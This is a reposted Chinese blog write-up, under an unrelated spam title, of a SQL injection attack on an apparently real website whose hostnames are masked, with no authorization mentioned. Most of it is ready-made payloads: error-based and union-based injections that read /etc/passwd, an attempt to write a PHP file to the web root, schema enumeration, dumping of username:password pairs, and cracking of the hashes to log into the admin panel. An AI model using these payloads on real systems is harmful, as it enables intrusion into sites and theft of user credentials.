您的位置:首页 > 科技 > 能源 > excel小程序商店下载_php开源订单管理系统_网站网上推广_微信群免费推广平台

excel小程序商店下载_php开源订单管理系统_网站网上推广_微信群免费推广平台

2024/12/23 9:43:12 来源:https://blog.csdn.net/A19911511842/article/details/144082237  浏览:    关键词:excel小程序商店下载_php开源订单管理系统_网站网上推广_微信群免费推广平台
excel小程序商店下载_php开源订单管理系统_网站网上推广_微信群免费推广平台

1. 在寻找某处的资产时找到一个查询的页面:

https://xxxxxxxxxxx/index.php/all

随便查询一下,然后抓包:

测试发现这里存在注入:

由于有报错信息,首先考虑报错注入:

Poc: '+and+updatexml(0x7e,concat(0x7e,database()),0x7e)='1

这里看看是什么用户:

root@localhost用户,权限还挺大,由于没有waf,试试看能不能读取文件,这里已经提前测试过是linux系统了,所以尝试读取/etc/passwd文件:

Exp: '+and+updatexml(0x7e,concat(0x7e,load_file('/etc/passwd')),0x7e)='1

(load_file()函数你可以把它看成和user()或者database()函数差不多的用法,可以直接用,只是比他们多一个括号里的参数而已)

发现读取成功,但是这里由于报错函数可显示的最大长度有限,并不能完整的显示出来,这里有思路就是string函数去分段截取,一次截取一点,这样可以,但是太麻烦,也不知道这文件到底有多长)思来想去,试了好久才想起来要不直接用联合查询?虽然这里报了错误信息,但不代表没有联合查询的注入嘛,

所以先试试看能不能显示出来,

Poc: '+order+by+10--+

先最大长度的去试试,看返回几位,最后发现,返回8位:

于是我开始构造exp:

'+union+select+1,2,3,4,5,6,7,8--+

这里有点不一样,就算前面为真也一样的会全部显示,所以不需要可以去把前面弄为假。

于是在知道显示位置后,开始读取文件:(这里先把文件转换成十六进制编码,方便读取)

Exp:'+union+select+1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764)--+

可以发现已经全部读取成功:

既然有读的权限,那也许有写的权限呢?

于是尝试一下写入,但是有个问题,写道哪里呢?

突然想起之间报错注入好像出现过一个php路径:

/home/csg/university/controllers/all.php

这个目录,我可以先随便试试写入一下,看这个能否写入,如果可以在后续利用,于是:

Exp: '+union+select+1,2,3,4,5,6,7,8+into+outfile+"/home/csg/university/controllers/abc.php"--+

这里尝试在那个位置写个abc.php文件,发现写入失败,那没办法了。

但是我心有不甘,要不就查出他的账户密码?

于是查一下他的所有数据库

Exp:

'+union+select+1,2,group_concat(schema_name),4,5,6,7,8+from+information_schema.schemata--+

好像没啥特点,还是看看当前数据库下的东西吧

然后找一下当前数据库试试:

Exp:

'+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--+

看到后面的univ_user了嘛,感觉有点像用户列表,查看一下:

Exp:

'+union+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_schema=database()+and+table_name='univ_user'--+

找到了username和password,于是看看:

Exp:

'+union+select+1,2,group_concat(concat_ws(':',username,password)),4,5,6,7,8+from+college.univ_user--+

然后拿去解密,我猜应该是MD5加密,试试运气能不能解出来:

哈哈,功夫不负有心人,直接拿下了,于是找到该网站后台:

https://zzzzzzzzzzzzzzzzzzzzz/index.php/login

输入得到的账户密码:

成功登陆:

哈哈,千辛万苦,万苦千辛。终于进来了。后续就是文件上传了。属于私密内容了;哈哈。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com